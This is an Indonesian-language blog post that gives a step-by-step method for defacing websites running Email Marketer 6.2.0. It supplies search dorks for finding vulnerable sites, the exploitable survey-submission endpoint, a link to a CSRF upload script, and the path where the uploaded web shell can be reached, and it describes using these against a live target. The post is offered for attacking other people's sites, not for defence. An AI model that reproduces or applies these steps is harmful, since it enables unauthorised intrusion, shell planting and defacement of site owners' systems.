Post

9/recent/ticker-posts

Deface poc Email Marketer 6.2.0

 


Oke kali ini saya akan membagikan cara deface poc Email Marketer 6.2.0.

Poc lama sih tapi web yang vuln bnyk :v.

Oke lanjut

--------------------------------------------

Bahan bahan :

1. Dork : 

intext:"emailmarketer" + control; panel"

inurl:/emailmarketer/admin

( kembangin beb ) 

2. Exploit :

/surveys_submit.php?formId=1337 

4.Csrf :

https://pastebin.com/28A2MFaE

3. Akses Shell :

/admin/temp/surveys/1337/(shell/sc name) 

--------------------------------------------

Oke jadi di sini gua sudah mempunyai live target jadi langsung aja ya.. 


1. Ciri" vuln : Blank



Nah blank = vuln


2. Oke lanjut ke CSRF

Oiya gua di sini up sc aja ya.. 



Nah seperti itu tampilan CSRF Email Marketer 6.2.0

3. Akses shell/sc

https://site.com/admin/temp/surveys/1337/(shell/sc) 

4. Boom! 


Oiya di script CSRF nya gambar dan target gua gk gnti, asli dari yang buat, klo ini gua recode dikit, tapi gua kasih yg aslinya :'v

Saya rasa cukup dan sampai sini saja yaa.. Byee <3


Posting Komentar

0 Komentar